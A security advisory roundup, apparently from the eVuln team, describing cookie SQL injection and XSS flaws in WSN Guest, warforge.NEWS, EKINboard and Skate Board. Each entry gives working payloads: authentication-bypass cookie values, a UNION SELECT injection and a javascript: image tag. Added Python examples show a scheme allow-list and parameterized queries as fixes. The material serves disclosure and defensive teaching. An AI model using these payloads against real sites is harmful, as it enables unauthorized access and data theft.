Recent Cookie SQL Injection vulnerabilities

Here is a short summary of recent Cookie SQL Injection vulnerabilities discovered by the eVuln team. The full list, with details, is available on the eVuln Security Advisories page.

wsnuser Cookie SQL Injection vulnerability in WSN Guest.

Description.

It is possible to inject an arbitrary SQL query through the wsnuser cookie parameter in the index.php script.

The wsnuser parameter is used in an SQL query without proper sanitization.

Exploit.

Cookie SQL Injection PoC (HTTP request):
GET /wsnguest/index.php?debug=1 HTTP/1.0
Host: website
Cookie: wsnuser=[SQL Injection]

Solution

Solution is not available.


SQL Injection and Multiple XSS in warforge.NEWS.

Description.

Vulnerable script: authcheck.php

The cookie variable $_COOKIE[authusername] is not properly sanitized before being used in an SQL query. This can be used to bypass authentication or to run any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

Exploit.

Authorization Bypass Example:

URL: http://[host]/news/index.php

Cookie values:

  • authusername=' or 1/*
  • authaccess=1
  • authemail=qwe@qqwe.com
  • authpassword=any
  • authfirst_name=any
  • authlast_name=any
  • authaccess=3

Solution

Solution is not available.


img BBCode XSS and Cookie SQL Injection in EKINboard.

Description.

Arbitrary JavaScript code insertion is possible through the BBCode [img] tag.

Vulnerable Script: config.php

The variables $_COOKIE['username'] and $_COOKIE['password'] are not properly sanitized. This can be used to bypass authentication or to run any SQL query by injecting arbitrary SQL code.

Exploit.

[img=javascript:alert(123)]

Cookie: username=' or 1/*

Cookie: password=[any]
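The [img] payload above works because the value inside the tag is placed into the src attribute without any check on its URL scheme, so a javascript: URL is handed straight to the browser. As an added example, not EKINboard's code (the regex, the function names and the sample inputs are assumptions), here is a small Python renderer that accepts only absolute http(s) URLs in [img] tags and shows any other tag as literal text:

```python
import html
import re
from urllib.parse import urlsplit

# Matches [img=URL] (the form used in the advisory) and [img]URL[/img].
# Assumed BBCode grammar; group 1 or group 2 holds the URL.
IMG_RE = re.compile(r"\[img=([^\]]+)\]|\[img\]([^\[]+)\[/img\]", re.IGNORECASE)


def safe_img_url(url):
    """Return the URL if it is an absolute http(s) URL, otherwise None.

    Allowing only http/https blocks javascript:, data:, vbscript: and
    scheme-relative (//host) values alike. Whitespace and control characters
    are rejected before parsing because a browser still executes
    'java\\tscript:' even though a naive prefix check would not catch it.
    """
    url = url.strip()
    if any(ch.isspace() or ord(ch) < 0x20 for ch in url):
        return None
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. a malformed IPv6 bracket literal
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return url


def render_img_bbcode(text):
    """Convert [img] BBCode to <img> tags, HTML-escaping everything else.

    Text outside the tags is escaped too, so the only markup that can reach
    the output is the <img> element built here from a validated URL.
    """
    out = []
    pos = 0
    for m in IMG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = safe_img_url(m.group(1) or m.group(2))
        if url is None:
            # Show the rejected tag literally instead of rendering it.
            out.append(html.escape(m.group(0)))
        else:
            out.append('<img src="%s" alt="">' % html.escape(url, quote=True))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample inputs: the advisory's payload and a benign image.
    print(render_img_bbcode("[img=javascript:alert(123)]"))
    print(render_img_bbcode("[img]http://example.com/pic.png[/img] <b>hi</b>"))
```

An allow-list on the scheme is the point: a deny-list of "javascript:" misses case changes, embedded tabs and the other script-capable schemes, whereas only http and https are ever useful for an image.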

Solution.

Vendor-provided patch is available here:

http://www.ekinboard.com/forums/v1/viewtopic.php?id=469


Multiple Vulnerabilities in Skate Board.

Description.

Vulnerable script: includes/root/sendpass.php

The variable $_POST[usern] is not properly sanitized before being used in an SQL query. This can be used to run any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off

Vulnerable scripts: includes/root/login.php, includes/root/logged.php

The variables $_POST[usern], $_POST[passwd] and $_COOKIE[sf_cookie] are not properly sanitized before being used in an SQL query. This can be used to run any SQL query by injecting arbitrary SQL code and to bypass authorization.

Condition: magic_quotes_gpc = off

The administrator is able to edit the values of variables in config.php. This can be used to inject arbitrary PHP code.

System access is possible.

Vulnerable script: includes/root/reguser.php

The user-supplied data from the registration form is not properly sanitized. This can be used to inject arbitrary HTML or script code.

Exploit.

URL: http://[host]/index.php?act=lostpass

Username: aaa' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

a) From the login form:

username: [username]' and 1/*

password: any

b) Cookie value:

Cookie: sf_cookie=admin%27+and+1%2F%2A%3Basd

Minimum username length: 3 characters.

URL: http://[host]/index.php?act=register

username: [XSS]

Full Name: [XSS]

Location: [XSS]

ICQ: [XSS]

Yahoo: [XSS]

Solution

Solution is not available.

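The cookie-based bypasses listed above (authusername in warforge.NEWS, username/password in EKINboard, sf_cookie in Skate Board) all follow one pattern: a $_COOKIE value is pasted into the SQL string, and with magic_quotes_gpc off the quote in ' or 1/* closes the string literal while /* comments out the rest of the query. The following is an added example, not code from any of those projects: a Python sketch that parses a raw Cookie header the way PHP fills $_COOKIE, runs the vulnerable and the parameterized check side by side against an in-memory SQLite table, and returns the rows each one matches. The table schema, the user rows, the Cookie headers and the choice to treat the whole sf_cookie value as the username field are assumptions; SQLite is used so the example runs offline, and its treatment of an unterminated /* as a comment to the end of the statement is what makes the truncation visible here (check the same behaviour on the engine you actually target).

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed Cookie headers, modelled on the payloads in the advisories above.
COOKIE_WARFORGE = "authusername=' or 1/*; authaccess=3; authpassword=any"
COOKIE_SKATEBOARD = "sf_cookie=admin%27+and+1%2F%2A%3Basd"


def parse_cookie_header(header):
    """Split a raw Cookie header into {name: value}, URL-decoding each value
    the way PHP populates $_COOKIE (simplified; quoted values are not handled)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = unquote_plus(value)
    return cookies


def setup_db():
    """In-memory users table (assumed schema; the advisories do not give one)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, access INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, access) VALUES (?, ?, ?)",
        [("admin", "s3cret", 3), ("alice", "hunter2", 1)],
    )
    return conn


def vulnerable_auth(conn, username, password):
    """The pattern described in the advisories: cookie values dropped into the
    SQL string with no escaping (magic_quotes_gpc = off).
    Returns the matched (username, access) row, or None."""
    sql = ("SELECT username, access FROM users "
           "WHERE username='%s' AND password='%s'" % (username, password))
    return conn.execute(sql).fetchone()


def safe_auth(conn, username, password):
    """Same check with bound parameters: the cookie value is only ever
    compared as data and can never be parsed as SQL."""
    return conn.execute(
        "SELECT username, access FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()


def demo():
    conn = setup_db()
    results = {}
    c = parse_cookie_header(COOKIE_WARFORGE)
    # With username "' or 1/*" the query becomes
    #   ... WHERE username='' or 1   (everything after /* is a comment)
    # which matches every row, so the first user (here admin) is logged in.
    results["warforge_vuln"] = vulnerable_auth(conn, c["authusername"], c["authpassword"])
    results["warforge_safe"] = safe_auth(conn, c["authusername"], c["authpassword"])
    results["warforge_access_cookie"] = c["authaccess"]  # also fully client-controlled

    s = parse_cookie_header(COOKIE_SKATEBOARD)["sf_cookie"]  # admin' and 1/*;asd
    # Assumption: the whole cookie value is used as the username field, giving
    #   ... WHERE username='admin' and 1   (rest commented out)
    results["skate_vuln"] = vulnerable_auth(conn, s, "any")
    results["skate_safe"] = safe_auth(conn, s, "any")
    return results


if __name__ == "__main__":
    for key, row in demo().items():
        print(key, row)
```

Note that the authaccess cookie in the warforge.NEWS case never touches the database: it is read back exactly as the client sent it, which is why an authorization level stored in a plain cookie is a bypass on its own, independent of the injection.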